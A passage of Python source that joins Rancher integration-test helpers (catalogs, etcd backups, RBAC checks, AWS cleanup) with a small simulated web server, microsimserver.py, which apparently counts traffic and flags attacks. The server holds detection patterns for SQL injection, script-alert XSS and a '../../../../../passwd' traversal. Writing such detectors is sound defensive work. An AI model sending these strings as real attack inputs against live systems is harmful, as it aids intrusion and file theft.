return "catalog://?catalog=" + catalog_name + \
"&template=" + template + "&version=" + version
elif catalog_type == "project" or catalog_type == "cluster":
return "catalog://?catalog=" + project_cluster_id + "/" \
+ catalog_name + "&type=" + catalog_type \
+ "Catalog&template=" + template + "&version=" + version
def wait_for_catalog_active(client, catalog, timeout=DEFAULT_CATALOG_TIMEOUT):
time.sleep(2)
catalog_data = client.list_catalog(name=catalog.name)
print(catalog_data)
start = time.time()
assert len(catalog_data["data"]) >= 1, "Cannot find catalog"
catalog = catalog_data["data"][0]
while catalog.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
catalog_data = client.list_catalog(name=catalog.name)
assert len(catalog_data["data"]) >= 1
catalog = catalog_data["data"][0]
return catalog
def readDataFile(data_dir, name):
fname = os.path.join(data_dir, name)
print("File: " + fname)
is_file = os.path.isfile(fname)
assert is_file
with open(fname) as f:
return f.read()
def set_url_password_token(rancher_url, server_url=None, version=""):
"""Returns a ManagementContext for the default global admin user."""
auth_url = \
rancher_url + "/v3-public/localproviders/local?action=login"
rpassword = 'admin'
print(auth_url)
if version.find("master") > -1 or version.find("2.6") > -1:
rpassword = ADMIN_PASSWORD
print("on 2.6 or later")
retries = 5
for attempt in range(1, retries):
try:
r = requests.post(auth_url, json={
'username': 'admin',
'password': rpassword,
'responseType': 'json',
}, verify=False)
except requests.exceptions.RequestException:
print("password request failed. Retry attempt: ",
"{} of {}".format(attempt, retries))
time.sleep(2)
else:
break
print(r.json())
token = r.json()['token']
print(token)
# Change admin password
client = rancher.Client(url=rancher_url + "/v3",
token=token, verify=False)
admin_user = client.list_user(username="admin").data
admin_user[0].setpassword(newPassword=ADMIN_PASSWORD)
# Set server-url settings
serverurl = client.list_setting(name="server-url").data
if server_url:
client.update(serverurl[0], value=server_url)
else:
client.update(serverurl[0], value=rancher_url)
return token
def validate_create_catalog(token, catalog_name, branch, url, permission=True):
"""
This function validates if the user has the permission to create a
global catalog.
:param token: user's token
:param catalog_name: the name of the catalog
:param branch: the branch of the git repo
:param url: the url of the git repo
:param permission: boolean value, True if the user can create catalog
:return: the catalog object or None
"""
client = get_client_for_token(token)
if not permission:
with pytest.raises(ApiError) as e:
client.create_catalog(name=catalog_name,
branch=branch,
url=url)
error_msg = "user with no permission should receive 403: Forbidden"
error_code = e.value.error.code
error_status = e.value.error.status
assert error_status == 403 and error_code == 'Forbidden', error_msg
return None
else:
try:
client.create_catalog(name=catalog_name,
branch=branch,
url=url)
except ApiError as e:
assert False, "user with permission should receive no exception:" \
+ str(e.error.status) + " " + e.error.code
catalog_list = client.list_catalog(name=catalog_name).data
assert len(catalog_list) == 1
return catalog_list[0]
def generate_template_global_role(name, new_user_default=False, template=None):
""" generate a template that is used for creating a global role"""
if template is None:
template = TEMPLATE_MANAGE_CATALOG
template = deepcopy(template)
if new_user_default:
template["newUserDefault"] = "true"
else:
template["newUserDefault"] = "false"
if name is None:
name = random_name()
template["name"] = name
return template
def wait_for_backup_to_active(cluster, backupname,
timeout=DEFAULT_TIMEOUT):
start = time.time()
etcdbackups = cluster.etcdBackups(name=backupname)
assert len(etcdbackups) == 1
etcdbackupdata = etcdbackups['data']
etcdbackupstate = etcdbackupdata[0]['state']
while etcdbackupstate != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
etcdbackups = cluster.etcdBackups(name=backupname)
assert len(etcdbackups) == 1
etcdbackupdata = etcdbackups['data']
etcdbackupstate = etcdbackupdata[0]['state']
print("BACKUP STATE")
print(etcdbackupstate)
return etcdbackupstate
def wait_for_backup_to_delete(cluster, backupname,
timeout=DEFAULT_TIMEOUT):
start = time.time()
etcdbackups = cluster.etcdBackups(name=backupname)
while len(etcdbackups) == 1:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for backup to be deleted")
time.sleep(.5)
etcdbackups = cluster.etcdBackups(name=backupname)
def validate_backup_create(namespace, backup_info, backup_mode=None):
p_client = namespace["p_client"]
ns = namespace["ns"]
cluster = namespace["cluster"]
name = random_test_name("default")
if not hasattr(cluster, 'rancherKubernetesEngineConfig'):
assert False, "Cluster is not of type RKE"
con = [{"name": "test1",
"image": TEST_IMAGE}]
backup_info["workload"] = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id,
daemonSetConfig={})
validate_workload(p_client, backup_info["workload"], "daemonSet", ns.name,
len(get_schedulable_nodes(cluster)))
host = "test" + str(random_int(10000, 99999)) + ".com"
namespace["host"] = host
path = "/name.html"
rule = {"host": host,
"paths": [{"workloadIds": [backup_info["workload"].id],
"targetPort": TEST_IMAGE_PORT}]}
p_client.create_ingress(name=name,
namespaceId=ns.id,
rules=[rule])
validate_ingress(p_client, cluster, [backup_info["workload"]], host, path)
# Perform Backup
user_client = get_user_client()
cluster = user_client.reload(cluster)
backup = cluster.backupEtcd()
backup_info["backupname"] = backup['metadata']['name']
wait_for_backup_to_active(cluster, backup_info["backupname"])
# Get all the backup info
etcdbackups = cluster.etcdBackups(name=backup_info["backupname"])
backup_info["etcdbackupdata"] = etcdbackups['data']
backup_info["backup_id"] = backup_info["etcdbackupdata"][0]['id']
if backup_mode == "s3":
backupfileurl = backup_info["etcdbackupdata"][0]['filename']
# Check the backup filename exists in S3
parseurl = urlparse(backupfileurl)
backup_info["backupfilename"] = os.path.basename(parseurl.path)
backup_found = AmazonWebServices().s3_backup_check(
backup_info["backupfilename"])
assert backup_found, "the backup was not found in the S3 bucket"
elif backup_mode == 'filesystem':
for node in namespace['nodes']:
if 'etcd' not in node.roles:
continue
get_filesystem_snapshots = 'ls /opt/rke/etcd-snapshots'
response = node.execute_command(get_filesystem_snapshots)[0]
assert backup_info["etcdbackupdata"][0]['filename'] in response, \
"The filename doesn't match any of the files locally"
return namespace, backup_info
def validate_backup_restore(namespace, backup_info):
p_client = namespace["p_client"]
ns = namespace["ns"]
client = get_user_client()
cluster = namespace["cluster"]
name = random_test_name("default")
host = namespace["host"]
path = "/name.html"
con = [{"name": "test1",
"image": TEST_IMAGE}]
# Create workload after backup
testworkload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id)
validate_workload(p_client, testworkload, "deployment", ns.name)
# Perform Restore
cluster.restoreFromEtcdBackup(etcdBackupId=backup_info["backup_id"])
# After restore, validate cluster
validate_cluster(client, cluster, intermediate_state="updating",
check_intermediate_state=True,
skipIngresscheck=False)
# Verify the ingress created before taking the snapshot
validate_ingress(p_client, cluster, [backup_info["workload"]], host, path)
# Verify the workload created after getting a snapshot does not exist
# after restore
workload_list = p_client.list_workload(uuid=testworkload.uuid).data
print(len(workload_list))
assert len(workload_list) == 0, "workload shouldn't exist after restore"
return namespace, backup_info
def validate_backup_delete(namespace, backup_info, backup_mode=None):
client = get_user_client()
cluster = namespace["cluster"]
client.delete(
cluster.etcdBackups(name=backup_info["backupname"])['data'][0]
)
wait_for_backup_to_delete(cluster, backup_info["backupname"])
assert len(cluster.etcdBackups(name=backup_info["backupname"])) == 0, \
"backup shouldn't be listed in the Cluster backups"
if backup_mode == "s3":
# Check the backup reference is deleted in Rancher and S3
backup_found = AmazonWebServices().s3_backup_check(
backup_info["backupfilename"])
assert_message = "The backup should't exist in the S3 bucket"
assert backup_found is False, assert_message
elif backup_mode == 'filesystem':
for node in namespace['nodes']:
if 'etcd' not in node.roles:
continue
get_filesystem_snapshots = 'ls /opt/rke/etcd-snapshots'
response = node.execute_command(get_filesystem_snapshots)[0]
filename = backup_info["etcdbackupdata"][0]['filename']
assert filename not in response, \
"The file still exist in the filesystem"
def apply_crd(ns, file, kubectl_context):
return execute_kubectl_cmd('apply -f ' + file + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def get_crd(ns, crd_name, kubectl_context):
return execute_kubectl_cmd('get ' + crd_name + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def delete_crd(ns, file, kubectl_context):
return execute_kubectl_cmd('delete -f ' + file + ' -n ' + ns.name,
json_out=False, stderr=True,
kubeconfig=kubectl_context).decode("ascii")
def prepare_auth_data():
name = \
os.path.join(os.path.dirname(os.path.realpath(__file__)) + "/resource",
AUTH_PROVIDER.lower() + ".json")
with open(name) as reader:
auth_data = reader.read()
raw = json.loads(auth_data).get("nested_group_info")
nested_group["auth_info"] = raw.copy()
nested_group["users"] = raw.get("users")
raw.pop("users")
nested_group["group_dic"] = raw
nested_group["groups"] = raw.keys()
def is_nested():
""" check if the provided groups are nested groups,
return True if at least one of the groups contains other groups
"""
count = 0
for user, group in nested_group["group_dic"].items():
if len(group) == 0:
count += 1
if count < len(nested_group["group_dic"]):
return True
return False
def get_group(nested=False):
""" return a group or a nested group"""
if nested:
# return the name of a group that contains at least one other group
for item in nested_group["groups"]:
if len(nested_group["group_dic"].get(item).get("users")) == 0:
pass
sub_groups = nested_group["group_dic"].get(item).get("groups")
if len(sub_groups) == 0:
pass
for g in sub_groups:
if len(nested_group["group_dic"].get(g).get("users")) > 0:
return item
assert False, "cannot find any valid nested group"
else:
# return the name of a group that has at least one direct user
for group in nested_group["groups"]:
if len(nested_group["group_dic"].get(group).get("users")) > 0:
return group
assert False, "cannot find any valid non-nested group"
def get_user_by_group(group, nested=False):
""" return the list of uses in the group or nested group
if nested is False, return the direct users in the group;
otherwise, return all users including those from nested groups
"""
def get_user_in_nested_group(group, source):
if group == "":
return []
users = source["group_dic"].get(group).get("users")
for sub_group in source["group_dic"].get(group).get("groups"):
temp = get_user_in_nested_group(sub_group, source)
for user in temp:
if user not in users:
users.append(user)
return users
if nested:
users = get_user_in_nested_group(group, nested_group)
assert len(users) > 0, "no user in the group"
else:
users = nested_group["group_dic"].get(group).get("users")
assert users is not None, "no user in the group"
print("group: {}, users: {}".format(group, users))
return users
def get_a_group_and_a_user_not_in_it(nested=False):
""" return a group or a nested group and a user that is not in the group"""
all_users = nested_group["users"]
for group in nested_group["groups"]:
group_users = get_user_by_group(group, nested)
for user in all_users:
if user not in group_users:
print("group: {}, user not in it: {}".format(group, user))
return group, user
assert False, "cannot find a group and a user not in it"
def get_group_principal_id(group_name, token=ADMIN_TOKEN, expected_status=200):
""" get the group's principal id from the auth provider"""
headers = {'Authorization': 'Bearer ' + token}
r = requests.post(CATTLE_AUTH_PRINCIPAL_URL,
json={'name': group_name,
'principalType': 'group',
'responseType': 'json'},
verify=False, headers=headers)
assert r.status_code == expected_status
return r.json()['data'][0]["id"]
def login_as_auth_user(username, password, login_url=LOGIN_AS_AUTH_USER_URL):
""" login with the user account from the auth provider,
and return the user token"""
r = requests.post(login_url, json={
'username': username,
'password': password,
'responseType': 'json',
}, verify=False)
assert r.status_code in [200, 201]
return r.json()
def validate_service_discovery(workload, scale,
p_client=None, ns=None, testclient_pods=None):
expected_ips = []
pods = p_client.list_pod(workloadId=workload["id"]).data
assert len(pods) == scale
for pod in pods:
expected_ips.append(pod["status"]["podIp"])
host = '{0}.{1}.svc.cluster.local'.format(workload.name, ns.id)
for pod in testclient_pods:
validate_dns_entry(pod, host, expected_ips)
def auth_get_project():
return auth_rbac_data["project"]
def auth_get_namespace():
return auth_rbac_data["namespace"]
def auth_get_user_token(username):
if username in auth_rbac_data["users"].keys():
return auth_rbac_data["users"][username].token
return None
def add_role_to_user(user, role):
"""this function adds a user from the auth provider to given cluster"""
admin_client, cluster = get_global_admin_client_and_cluster()
project = auth_get_project()
ns = auth_get_namespace()
if not (project and ns):
project, ns = create_project_and_ns(ADMIN_TOKEN, cluster,
random_test_name("p-test-auth"))
auth_rbac_data["project"] = project
auth_rbac_data["namespace"] = ns
if role in [PROJECT_OWNER, PROJECT_MEMBER, PROJECT_READ_ONLY]:
assign_members_to_project(admin_client, user, project, role)
else:
assign_members_to_cluster(admin_client, user, cluster, role)
auth_rbac_data["users"][user.username] = user
def auth_resource_cleanup():
""" remove the project and namespace created for the AUTH tests"""
client, cluster = get_global_admin_client_and_cluster()
client.delete(auth_rbac_data["project"])
auth_rbac_data["project"] = None
auth_rbac_data["ns"] = None
for username, user in auth_rbac_data["users"].items():
user_crtbs = client.list_cluster_role_template_binding(userId=user.id)
for crtb in user_crtbs:
client.delete(crtb)
class WebsocketLogParse:
"""
the class is used for receiving and parsing the message
received from the websocket
"""
def __init__(self):
self.lock = Lock()
self._last_message = ''
def receiver(self, socket, skip, b64=True):
"""
run a thread to receive and save the message from the web socket
:param socket: the socket connection
:param skip: if True skip the first char of the received message
"""
while True and socket.connected:
try:
data = socket.recv()
# the message from the kubectl contains an extra char
if skip:
data = data[1:]
if len(data) < 5:
pass
if b64:
data = base64.b64decode(data).decode()
self.lock.acquire()
self._last_message += data
self.lock.release()
except websocket.WebSocketConnectionClosedException:
print("Connection closed")
break
except websocket.WebSocketProtocolException as wpe:
print("Error: {}".format(wpe))
break
@staticmethod
def start_thread(target, args):
thread = Thread(target=target, args=args)
thread.daemon = True
thread.start()
time.sleep(1)
@property
def last_message(self):
return self._last_message
@last_message.setter
def last_message(self, value):
self.lock.acquire()
self._last_message = value
self.lock.release()
def wait_for_cluster_delete(client, cluster_name, timeout=DEFAULT_TIMEOUT):
start = time.time()
cluster = client.list_cluster(name=cluster_name).data
cluster_count = len(cluster)
while cluster_count != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for cluster to get deleted")
time.sleep(.5)
cluster = client.list_cluster(name=cluster_name).data
cluster_count = len(cluster)
def create_connection(url, subprotocols):
"""
create a webscoket connection and check if it is connected
:param url: the url to connect to
:param subprotocols: the list of subprotocols
:return:
"""
ws = websocket.create_connection(
url=url,
sslopt={"cert_reqs": ssl.CERT_NONE},
subprotocols=subprotocols,
timeout=10,
cookie="R_SESS=" + USER_TOKEN
)
assert ws.connected, "failed to build the websocket"
return ws
def wait_for_hpa_to_active(client, hpa, timeout=DEFAULT_TIMEOUT):
start = time.time()
hpalist = client.list_horizontalPodAutoscaler(uuid=hpa.uuid).data
assert len(hpalist) == 1
hpa = hpalist[0]
while hpa.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
hpas = client.list_horizontalPodAutoscaler(uuid=hpa.uuid).data
assert len(hpas) == 1
hpa = hpas[0]
return hpa
def create_pv_pvc(client, ns, nfs_ip, cluster_client):
pv_object = create_pv(cluster_client, nfs_ip)
pvc_name = random_test_name("pvc")
pvc_config = {"accessModes": ["ReadWriteOnce"],
"name": pvc_name,
"volumeId": pv_object.id,
"namespaceId": ns.id,
"storageClassId": "",
"resources": {"requests": {"storage": "10Gi"}}
}
pvc_object = client.create_persistent_volume_claim(pvc_config)
pvc_object = wait_for_pvc_to_be_bound(client, pvc_object, timeout=300)
return pv_object, pvc_object
def create_pv(client, nfs_ip):
pv_name = random_test_name("pv")
pv_config = {"type": "persistentVolume",
"accessModes": ["ReadWriteOnce"],
"name": pv_name,
"nfs": {"readOnly": "false",
"type": "nfsvolumesource",
"path": NFS_SERVER_MOUNT_PATH,
"server": nfs_ip
},
"capacity": {"storage": "50Gi"}
}
pv_object = client.create_persistent_volume(pv_config)
capacitydict = pv_object['capacity']
assert capacitydict['storage'] == '50Gi'
assert pv_object['type'] == 'persistentVolume'
return pv_object
def delete_resource_in_AWS_by_prefix(resource_prefix):
"""
:param resource_prefix: the prefix of resource name
:return: None
"""
# delete nodes of both local and custom clusters
node_filter = [{
'Name': 'tag:Name',
'Values': [resource_prefix + "-*"]
}]
nodes = AmazonWebServices().get_nodes(filters=node_filter)
if nodes is None:
print("deleting the following instances: None")
else:
print("deleting the following instances: {}"
.format([node.public_ip_address for node in nodes]))
AmazonWebServices().delete_nodes(nodes)
# delete load balancer and target groups
tg_list = []
lb_list = []
lb_names = [resource_prefix + '-nlb',
resource_prefix + '-k3s-nlb',
resource_prefix + '-internal-nlb']
for name in lb_names:
lb_arn = AmazonWebServices().get_lb(name)
if lb_arn is not None:
lb_list.append(lb_arn)
res = AmazonWebServices().get_target_groups(lb_arn)
tg_list.extend(res)
print("deleting the following load balancers: {}".format(lb_list))
print("deleting the following target groups: {}".format(tg_list))
for lb in lb_list:
AmazonWebServices().delete_lb(lb)
for tg in tg_list:
AmazonWebServices().delete_target_group(tg)
# delete rds
db_name = resource_prefix + "-db"
print("deleting the database (if it exists): {}".format(db_name))
AmazonWebServices().delete_db(db_name)
# delete the route 53 record
route53_names = [resource_prefix + ".qa.rancher.space.",
resource_prefix + "-internal.qa.rancher.space."]
for name in route53_names:
print("deleting the route53 record (if it exists): {}".format(name))
AmazonWebServices().delete_route_53_record(name)
print("deletion is done")
return None
def configure_cis_requirements(aws_nodes, profile, node_roles, client,
cluster):
prepare_hardened_nodes(
aws_nodes, profile, node_roles, client, cluster, True)
cluster = validate_cluster_state(client, cluster)
# the workloads under System project to get active
time.sleep(20)
create_kubeconfig(cluster)
prepare_hardened_cluster('rke-cis-1.5', kube_fname)
return cluster
def get_node_details(cluster, client):
"""
lists the nodes from the cluster. This cluster has only 1 node.
:return: client and node object
"""
create_kubeconfig(cluster)
nodes = client.list_node(clusterId=cluster.id).data
assert len(nodes) > 0
for node in nodes:
if node.worker:
break
return client, node
def create_service_account_configfile():
client, cluster = get_user_client_and_cluster()
create_kubeconfig(cluster)
name = random_name()
# create a service account
execute_kubectl_cmd(cmd="create sa {}".format(name), json_out=False)
# get the ca and token
res = execute_kubectl_cmd(cmd="get secret -o name", json_out=False)
secret_name = ""
for item in res.split("\n"):
if name in item:
secret_name = item.split("/")[1]
break
res = execute_kubectl_cmd(cmd="get secret {}".format(secret_name))
ca = res["data"]["ca.crt"]
token = res["data"]["token"]
token = base64.b64decode(token).decode()
server = None
nodes = client.list_node(clusterId=cluster.id).data
for node in nodes:
if node.controlPlane:
server = "https://" + node.externalIpAddress + ":6443"
break
assert server is not None, 'failed to get the public ip of control plane'
config = """
apiVersion: v1
kind: Config
clusters:
- name: test-cluster
cluster:
server: {server}
certificate-authority-data: {ca}
contexts:
- name: default-context
context:
cluster: test-cluster
namespace: default
user: test-user
current-context: default-context
users:
- name: test-user
user:
token: {token}
"""
config = config.format(server=server, ca=ca, token=token)
config_file = os.path.join(os.path.dirname(os.path.realpath(__file__)),
name + ".yaml")
with open(config_file, "w") as file:
file.write(config)
return name
def rbac_test_file_reader(file_path=None):
"""
This method generates test cases from an input file and return the result
that can be used to parametrize pytest cases
:param file_path: the path to the JSON file for test cases
:return: a list of tuples of
(cluster_role, command, authorization, service account name)
"""
if test_rbac_v2 == "False":
return []
if file_path is None:
pytest.fail("no file is provided")
with open(file_path) as reader:
test_cases = json.loads(reader.read().replace("{resource_root}",
DATA_SUBDIR))
output = []
for cluster_role, checks in test_cases.items():
# create a service account for each role
name = create_service_account_configfile()
# create the cluster role binding
cmd = "create clusterrolebinding {} " \
"--clusterrole {} " \
"--serviceaccount {}".format(name, cluster_role,
"default:" + name)
execute_kubectl_cmd(cmd, json_out=False)
for command in checks["should_pass"]:
output.append((cluster_role, command, True, name))
for command in checks["should_fail"]:
output.append((cluster_role, command, False, name))
return output
def validate_cluster_role_rbac(cluster_role, command, authorization, name):
"""
This methods creates a new service account to validate the permissions
both before and after creating the cluster role binding between the
service account and the cluster role
:param cluster_role: the cluster role
:param command: the kubectl command to run
:param authorization: if the service account has the permission: True/False
:param name: the name of the service account, cluster role binding, and the
kubeconfig file
"""
config_file = os.path.join(os.path.dirname(os.path.realpath(__file__)),
name + ".yaml")
result = execute_kubectl_cmd(command,
json_out=False,
kubeconfig=config_file,
stderr=True).decode('utf_8')
if authorization:
assert "Error from server (Forbidden)" not in result, \
"{} should have the authorization to run {}".format(cluster_role,
command)
else:
assert "Error from server (Forbidden)" in result, \
"{} should NOT have the authorization to run {}".format(
cluster_role, command)
def wait_until_app_v2_deployed(client, app_name, timeout=DEFAULT_APP_V2_TIMEOUT):
"""
List all installed apps and check for the state of "app_name" to see
if it == "deployed"
:param client: cluster client for the user
:param app_name: app which is being installed
:param timeout: time for the app to come to Deployed state
:return:
"""
start = time.time()
app = client.list_catalog_cattle_io_app()
while True:
app_list = []
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to Deployed")
time.sleep(.5)
for app in app["data"]:
app_list.append(app["metadata"]["name"])
if app["metadata"]["name"] == app_name:
if app["status"]["summary"]["state"] == "deployed":
return app_list
app = client.list_catalog_cattle_io_app()
return
def wait_until_app_v2_uninstall(client, app_name, timeout=DEFAULT_APP_V2_TIMEOUT):
"""
list all installed apps. search for "app_name" in the list
if app_name is NOT in list, indicates the app has been uninstalled successfully
:param client: cluster client for the user
:param app_name: app which is being unstalled
:param timeout: time for app to be uninstalled
"""
start = time.time()
app = client.list_catalog_cattle_io_app()
while True:
app_list = []
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to Uninstalled")
time.sleep(.5)
for app in app["data"]:
app_list.append(app["metadata"]["name"])
if app_name not in app_list:
return app_list
app = client.list_catalog_cattle_io_app()
return
def check_v2_app_and_uninstall(client, chart_name):
app = client.list_catalog_cattle_io_app()
for app in app["data"]:
if app["metadata"]["name"] == chart_name:
response = client.action(obj=app, action_name="uninstall")
app_list = wait_until_app_v2_uninstall(client, chart_name)
assert chart_name not in app_list, \
"App has not uninstalled"
def update_and_validate_kdm(kdm_url, admin_token=ADMIN_TOKEN,
rancher_api_url=CATTLE_API_URL):
print("Updating KDM to use {}".format(kdm_url))
header = {'Authorization': 'Bearer ' + admin_token}
api_url = rancher_api_url + "/settings/rke-metadata-config"
kdm_json = {
"name": "rke-metadata-config",
"value": json.dumps({
"refresh-interval-minutes": "1440",
"url": kdm_url
})
}
r = requests.put(api_url, verify=False, headers=header, json=kdm_json)
r_content = json.loads(r.content)
assert r.ok
assert r_content['name'] == kdm_json['name']
assert r_content['value'] == kdm_json['value']
time.sleep(2)
# Refresh Kubernetes Metadata
kdm_refresh_url = rancher_api_url + "/kontainerdrivers?action=refresh"
response = requests.post(kdm_refresh_url, verify=False, headers=header)
assert response.ok
def prepare_hardened_nodes(aws_nodes, profile, node_roles,
client=None, cluster=None, custom_cluster=False):
i = 0
conf_file = DATA_SUBDIR + "/sysctl-config"
if profile == 'rke-cis-1.4':
for aws_node in aws_nodes:
file1 = open(conf_file, 'r')
while True:
line = file1.readline()
if not line:
break
aws_node.execute_command(line.strip())
if "etcd" in node_roles[i]:
aws_node.execute_command("sudo useradd etcd")
if custom_cluster:
docker_run_cmd = \
get_custom_host_registration_cmd(client,
cluster,
node_roles[i],
aws_node)
aws_node.execute_command(docker_run_cmd)
i += 1
elif profile == 'rke-cis-1.5':
for aws_node in aws_nodes:
file1 = open(conf_file, 'r')
while True:
line = file1.readline()
if not line:
break
aws_node.execute_command(line.strip())
if "etcd" in node_roles[i]:
aws_node.execute_command("sudo groupadd -g 52034 etcd")
aws_node.execute_command("sudo useradd -u 52034 -g 52034 etcd")
if custom_cluster:
docker_run_cmd = \
get_custom_host_registration_cmd(client,
cluster,
node_roles[i],
aws_node)
aws_node.execute_command(docker_run_cmd)
i += 1
time.sleep(5)
file1.close()
return aws_nodes
def prepare_hardened_cluster(profile, kubeconfig_path):
if profile == 'rke-cis-1.5':
network_policy_file = DATA_SUBDIR + "/default-allow-all.yaml"
account_update_file = DATA_SUBDIR + "/account_update.yaml"
items = execute_kubectl_cmd("get namespaces -A",
kubeconfig=kubeconfig_path)["items"]
all_ns = [item["metadata"]["name"] for item in items]
for ns in all_ns:
execute_kubectl_cmd("apply -f {0} -n {1}".
format(network_policy_file, ns),
kubeconfig=kubeconfig_path)
execute_kubectl_cmd('patch serviceaccount default'
' -n {0} -p "$(cat {1})"'.
format(ns, account_update_file),
kubeconfig=kubeconfig_path)
def print_kubeconfig(kpath):
kubeconfig_file = open(kpath, "r")
kubeconfig_contents = kubeconfig_file.read()
kubeconfig_file.close()
kubeconfig_contents_encoded = base64.b64encode(
kubeconfig_contents.encode("utf-8")).decode("utf-8")
print("\n\n" + kubeconfig_contents + "\n\n")
print("\nBase64 encoded: \n\n" + kubeconfig_contents_encoded + "\n\n")
|
microsimserver.py
|
#!/usr/local/bin/python3
import sys
import os
import socket
import time
import random
import string
import re
import json
import threading
import urllib.parse
from socketserver import ThreadingMixIn
from statsd import StatsClient
from http.server import BaseHTTPRequestHandler, HTTPServer
def str2bool(val):
if val and val.lower() != 'false':
return bool(val)
return False
LISTEN_PORT = int(os.getenv('LISTEN_PORT', 8080))
STATS_PORT = os.getenv('STATS_PORT', None)
STATSD_HOST = os.getenv('STATSD_HOST', None)
STATSD_PORT = int(os.getenv('STATSD_PORT', 8125))
RESPOND_BYTES = int(os.getenv('RESPOND_BYTES', 16384))
STOP_SECONDS = int(os.getenv('STOP_SECONDS', 0))
STOP_PADDING = str2bool(os.getenv('STOP_PADDING', False))
START_TIME = int(time.time())
HOST_NAME = ''
padding = 0
if STOP_SECONDS and STOP_PADDING:
padding = random.choice(range(STOP_SECONDS))
stats = {
'Total': {
'Requests': 0,
'Sent Bytes': 0,
'Received Bytes': 0,
'Attacks': 0,
'SQLi': 0,
'XSS': 0,
'Directory Traversal': 0
},
'Last 30 Seconds': {
'Requests': 0,
'Sent Bytes': 0,
'Received Bytes': 0,
'Attacks': 0,
'SQLi': 0,
'XSS': 0,
'Directory Traversal': 0
}
}
if STATSD_HOST:
server_stats = StatsClient(prefix='all_servers',
host=STATSD_HOST,
port=STATSD_PORT)
host_stats = StatsClient(prefix='server-' + socket.gethostname(),
host=STATSD_HOST,
port=STATSD_PORT)
lock = threading.Lock()
def keep_running():
if (STOP_SECONDS != 0) and ((START_TIME + STOP_SECONDS + padding) < int(time.time())):
sys.exit('Server killed after ' + str(int(STOP_SECONDS) + int(padding)) + ' seconds.')
return True
def insert_data():
return ''.join([random.choice(string.ascii_letters + string.digits) for n in range(RESPOND_BYTES)])
class ThreadingHTTPServer(ThreadingMixIn, HTTPServer):
pass
class state():
last_timestamp = START_TIME
def every_30_seconds():
with lock:
if state.last_timestamp + 30 > int(time.time()):
return False
state.last_timestamp = int(time.time())
return True
class httpd(BaseHTTPRequestHandler):
server_name = socket.gethostname()
server_ip = socket.gethostbyname(server_name)
def do_GET(self):
"""simple http response"""
host_header = self.headers['Host']
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
data = insert_data() + '\n'
info = time.asctime() + ' hostname: ' + self.server_name + ' ip: ' + self.server_ip + ' remote: ' + self.address_string() + ' hostheader: ' + str(host_header) + ' path: ' + self.path + '\n'
body = data + info
self.wfile.write(body.encode('utf-8'))
with lock:
stats['Total']['Requests'] += 1
stats['Total']['Sent Bytes'] += len(body)
stats['Last 30 Seconds']['Requests'] += 1
stats['Last 30 Seconds']['Sent Bytes'] += len(body)
if STATSD_HOST:
server_stats.incr('requests')
server_stats.incr('sent_bytes', len(body))
host_stats.incr('requests')
host_stats.incr('sent_bytes', len(body))
if re.search('UNION SELECT', urllib.parse.unquote_plus(self.path)):
print(time.strftime("%Y-%m-%dT%H:%M:%S") + ' SQLi attack detected')
with lock:
stats['Total']['Attacks'] += 1
stats['Total']['SQLi'] += 1
stats['Last 30 Seconds']['Attacks'] += 1
stats['Last 30 Seconds']['SQLi'] += 1
if STATSD_HOST:
server_stats.incr('attacks')
server_stats.incr('sqli')
host_stats.incr('attacks')
host_stats.incr('sqli')
if re.search('<script>alert', urllib.parse.unquote(self.path)):
print(time.strftime("%Y-%m-%dT%H:%M:%S") + ' XSS attack detected')
with lock:
stats['Total']['Attacks'] += 1
stats['Total']['XSS'] += 1
stats['Last 30 Seconds']['Attacks'] += 1
stats['Last 30 Seconds']['XSS'] += 1
if STATSD_HOST:
server_stats.incr('attacks')
server_stats.incr('xss')
host_stats.incr('attacks')
host_stats.incr('xss')
if re.search('../../../../../passwd', urllib.parse.unquote(self.path)):
print(time.strftime("%Y-%m-%dT%H:%M:%S") + ' Directory Traversal attack detected')
with lock:
stats['Total']['Attacks'] += 1
stats['Total']['Directory Traversal'] += 1
stats['Last 30 Seconds']['Attacks'] += 1
stats['Last 30 Seconds']['Directory Traversal'] += 1
if STATSD_HOST:
server_stats.incr('attacks')
server_stats.incr('directory_traversal')
host_stats.incr('attacks')
host_stats.incr('directory_traversal')
def do_POST(self):
"""json api response"""
host_header = self.headers['Host']
self.send_response(200)
self.send_header('Content-Type', 'application/json')
self.end_headers()
self.response = {
'data': insert_data(),
'time': time.asctime(),
'hostname': self.server_name,
'ip': self.server_ip,
'remote': self.address_string(),
'hostheader': host_header,
'path': self.path
}
body = json.dumps(self.response)
self.wfile.write(body.encode('utf-8'))
with lock:
stats['Total']['Requests'] += 1
stats['Total']['Sent Bytes'] += len(body)
stats['Total']['Received Bytes'] += int(self.headers['Content-Length'])
stats['Last 30 Seconds']['Requests'] += 1
stats['Last 30 Seconds']['Sent Bytes'] += len(body)
stats['Last 30 Seconds']['Received Bytes'] += int(self.headers['Content-Length'])
if STATSD_HOST:
server_stats.incr('requests')
server_stats.incr('sent_bytes', len(body))
server_stats.incr('received_bytes', int(self.headers['Content-Length']))
host_stats.incr('requests')
host_stats.incr('sent_bytes', len(body))
host_stats.incr('received_bytes', int(self.headers['Content-Length']))
if re.search(';UNION SELECT 1, version() limit 1,1--', urllib.parse.unquote(self.path)):
print(time.strftime("%Y-%m-%dT%H:%M:%S") + ' SQLi attack detected')
with lock:
stats['Total']['Attacks'] += 1
stats['Total']['SQLi'] += 1
stats['Last 30 Seconds']['Attacks'] += 1
stats['Last 30 Seconds']['SQLi'] += 1
if STATSD_HOST:
server_stats.incr('attacks')
server_stats.incr('sqli')
host_stats.incr('attacks')
host_stats.incr('sqli')
if re.search("pwd<script>alert('attacked')</script>", urllib.parse.unquote(self.path)):
print(time.strftime("%Y-%m-%dT%H:%M:%S") + ' XSS attack detected')
with lock:
